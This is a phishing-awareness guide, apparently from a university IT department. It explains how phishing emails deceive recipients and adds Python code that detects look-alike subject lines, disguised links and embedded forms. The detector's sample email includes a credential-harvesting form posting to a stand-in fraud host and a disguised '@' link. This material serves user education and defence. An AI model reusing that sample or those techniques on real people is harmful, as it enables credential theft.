What is Phishing?
The term 'Phishing' (pronounced 'fishing') describes a type of cybercrime in
which spoofed e-mail or instant messages are used as 'bait' to 'lure'
unsuspecting users into revealing personal information, such as usernames
and passwords, or credit card, banking or social security numbers.
Scammers 'phish' for your personal information in a variety of ways. Most
commonly, they send fraudulent e-mails claiming to be from MUSC's IT
department, or your bank, or any other business, government agency, social
media website, or other organization that already has some of your
personal details. Typically, the e-mail asks you to confirm these details,
either by replying to the e-mail, or by clicking on a link that takes you
to a fake website. In some phishing attacks, the fake website may closely
mimic the look and feel of the real web site of the institution or
business that is being spoofed.
Once scammers have tricked you into giving them your information, they can
use it in a number of ways. If you have given them your MUSC NetID and
password, they can break into your MUSC account, and use it for various
criminal purposes. If you have given them your credit card info, they can
use it to make unauthorized purchases. If you have given them your banking
info, they can clean out your account and send the money overseas in a
matter of seconds. In some cases, they may simply gather your personal
information, and sell it to identity theft rings.
Phishing emails are commonly used in association with a fake web site that looks very similar to a real website from the relevant institution.
Phishing Email Methods
The initial phishing email is designed to entice the recipient to open the email and click on the link provided. The fraudsters use several methods to do this, including enticing subject lines, forging the sender's address, using genuine-looking images and text, and disguising the links within the email.
1. Deceptive Subject Lines
Phishing emails tend to have subject lines that appear genuinely related to the supposed sender, in an attempt to entice the user to open the email, for example “Important notice for all Internet Banking Users”. It is also common for subject lines to substitute numerals or look-alike letters for characters in an attempt to bypass spam filters, such as a capital “I” in place of a lowercase “l” (the two are indistinguishable in many sans-serif fonts). Some phishing emails deliberately misspell key words for the same reason; most people would not notice this when quickly glancing at the subject line.
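As an added example (not part of the original MUSC page), the Python snippet below shows how a mail filter can undo the look-alike substitution and still catch deliberate misspellings: it lower-cases the subject, folds confusable characters (I, l, 1, | and similar) to one representative, and then fuzzy-matches each word against a watch list. The confusables table, the watch list and the sample subject lines are constructed for this example and are not taken from any product or from MUSC's filters.

```python
import difflib
import re
from typing import List, Tuple

# Characters that look alike in common sans-serif fonts, folded to one
# representative AFTER lower-casing (so a capital I posing as l, a digit 1
# and a pipe all become 'l'). Constructed table for this example; a real
# filter would use the Unicode confusables data.
LOOKALIKES = str.maketrans({
    "i": "l", "1": "l", "|": "l",
    "0": "o",
    "3": "e",
    "5": "s", "$": "s",
    "4": "a", "@": "a",
    "7": "t",
})

# Words a phishing subject line tends to lean on; constructed watch list.
WATCH_WORDS = ["account", "verification", "password", "suspended",
               "banking", "internet", "update", "confirm", "login"]


def normalize_subject(subject: str) -> str:
    """Lower-case, fold look-alike characters, drop punctuation, squeeze spaces."""
    folded = subject.lower().translate(LOOKALIKES)
    folded = re.sub(r"[^a-z ]+", " ", folded)
    return re.sub(r" +", " ", folded).strip()


def suspicious_words(subject: str, cutoff: float = 0.85) -> List[Tuple[str, str]]:
    """Return (folded_subject_word, watch_word) pairs.

    Both sides are folded the same way, so 'OnIine Banking' (capital I)
    folds to the same string as 'Online Banking'. difflib's similarity
    ratio lets deliberate misspellings such as 'verifcation' or 'acount'
    still clear the cutoff.
    """
    folded_watch = {normalize_subject(w): w for w in WATCH_WORDS}
    hits = []
    for word in normalize_subject(subject).split():
        for match in difflib.get_close_matches(word, folded_watch, n=1, cutoff=cutoff):
            hits.append((word, folded_watch[match]))
    return hits


if __name__ == "__main__":
    for subj in ("Important notice for all Internet Banking Users",
                 "Urgent: Verifcation of your acount",
                 "Lunch menu for Friday"):
        print(subj, "->", suspicious_words(subj))
```

Folding costs some precision (after folding, "oil" and "oll" collide), which is why the output is a list of hits to weigh alongside other signals rather than a verdict on its own.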
2. Forged Sender's Address
Forging the sender's address is an easy deception method. The From: address is simply text chosen by whoever sends the message, so there is no guarantee that the address listed as the sender's is genuine. Phishing emails will normally carry a forged sender's address so that the email appears to have come from the company it claims to be from. Mail systems can check the sending domain with SPF, DKIM and DMARC, but that only helps when the receiving server enforces those checks; the user cannot tell from the displayed address alone.
3. Genuine Looking Content
Phishing emails normally use images and text styles copied from the legitimate web site to make the email look genuine. Many consumers are fooled into thinking an email is genuine simply because it carries the bank's logo. Some phishing emails also include genuine links to the company's privacy policy and other pages on the legitimate web site, mixed in with the fraudulent one. Trust seals and authentication marks are also duplicated to build the user's confidence in the authenticity of the email.
4. Disguised Hyperlinks
Links within an email are deliberately disguised in another attempt to deceive the recipient. In an HTML email the visible link text and the actual destination (the href attribute) are separate, so a link can display a genuine URL but take the user to a different web site when clicked. For example, a link displayed as “http://www.genuine-site.com” may actually take the user to “http://www.fraud-site.com”. Hovering over the link without clicking usually reveals the real destination.
In text-only emails, a long URL may be presented with an “@” before the actual web site. For example, a link may be displayed as
“http://www.genuine-site.com-Verify83kcmdj30dk>Secure32902ds;lkjasdfkljad@fraud-site.com”
This would take the user to http://fraud-site.com, because everything before the “@” is treated as a username rather than as part of the host name, and the host is whatever follows the “@”. The link looks valid because it begins with the genuine site's URL and contains genuine-looking words. Newer browsers warn about, or strip, such embedded credentials, but the link still looks legitimate in the message itself.
5. Email Form
The email itself contains a form for the consumer to enter their personal information and click "submit", "send" or "update". Forms within emails post to a script on a remote server chosen by the fraudster, which either forwards the information to the fraudsters or stores it in a database for them to pick up later. The form's action attribute names the server that receives the data, and it is rarely the institution's own.
These methods are used by the more sophisticated phishing emails. Some amateur phishing emails contain poor spelling and grammar, no images, and may not even attempt to disguise the URL.
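To make methods 4 and 5 concrete, here is an added Python example (not code from the original page) that parses an HTML message, resolves each link's real host the way a browser would, including the “@” trick from the text-only case, and flags links whose visible text names a different host, links that leave the claimed domain, and forms that post elsewhere. The sample message is constructed for this example; the host names follow the page's genuine-site.com / fraud-site.com illustration, and collect.fraud-site.com is made up for the form.

```python
from html.parser import HTMLParser
from typing import List, Optional, Tuple
from urllib.parse import urlsplit


def real_host(url: str) -> Optional[str]:
    """Host a browser would actually connect to for an http(s) URL.

    urlsplit() treats everything before the last '@' in the authority as
    user:password, so the '@' trick from the text resolves to the part
    after the '@'. Non-http schemes (mailto:, javascript:) return None.
    """
    parts = urlsplit(url.strip())
    if parts.scheme.lower() not in ("http", "https"):
        return None
    return parts.hostname


def host_in_domain(host: str, domain: str) -> bool:
    """True if host is domain itself or a subdomain of it."""
    host, domain = host.lower(), domain.lower()
    return host == domain or host.endswith("." + domain)


class LinkAndFormCollector(HTMLParser):
    """Collect (href, visible text) for each <a> and the action of each <form>."""

    def __init__(self) -> None:
        super().__init__()
        self.links: List[Tuple[str, str]] = []
        self.forms: List[str] = []
        self._href: Optional[str] = None
        self._text: List[str] = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)          # attribute values arrive already HTML-unescaped
        if tag == "a":
            self._href, self._text = a.get("href") or "", []
        elif tag == "form":
            self.forms.append(a.get("action") or "")

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def analyze_email(html: str, claimed_domain: str) -> List[str]:
    """Flag disguised links and forms that post outside the claimed domain."""
    parser = LinkAndFormCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        target = real_host(href)
        if target is None:
            continue
        # If the visible text is itself a URL, compare the host it shows with
        # the host the href really goes to (method 4, HTML variant).
        shown = real_host(text) if "://" in text else None
        if shown and not host_in_domain(target, shown):
            findings.append(f"link text shows {shown} but points to {target}")
        elif not host_in_domain(target, claimed_domain):
            findings.append(f"link to {target} leaves {claimed_domain}")
    for action in parser.forms:          # method 5: form inside the message
        target = real_host(action)
        if target and not host_in_domain(target, claimed_domain):
            findings.append(f"form submits to {target}")
    return findings


# Constructed sample message (not a real phishing mail). The second link uses
# the page's '@' URL; '>' is written as &gt; because it sits in an attribute.
SAMPLE_EMAIL = """<html><body>
<img src="https://www.genuine-site.com/images/logo.png">
<p>Dear customer, please visit
<a href="http://www.fraud-site.com/verify">http://www.genuine-site.com</a>
to confirm your details, or use our
<a href="http://www.genuine-site.com-Verify83kcmdj30dk&gt;Secure32902ds;lkjasdfkljad@fraud-site.com">secure login</a>.
See also our <a href="https://www.genuine-site.com/privacy">privacy policy</a>.</p>
<form action="http://collect.fraud-site.com/cgi-bin/harvest" method="post">
  Username <input name="user"> Password <input name="pass" type="password">
  <input type="submit" value="Update">
</form>
</body></html>"""

if __name__ == "__main__":
    for finding in analyze_email(SAMPLE_EMAIL, "genuine-site.com"):
        print(finding)
```

The genuine privacy-policy link produces no finding, which is the point of method 3: a message can contain several real links and still carry one fraudulent link and one harvesting form. Links without a scheme (bare "www.fraud-site.com") are skipped here and would need their own handling in a production filter.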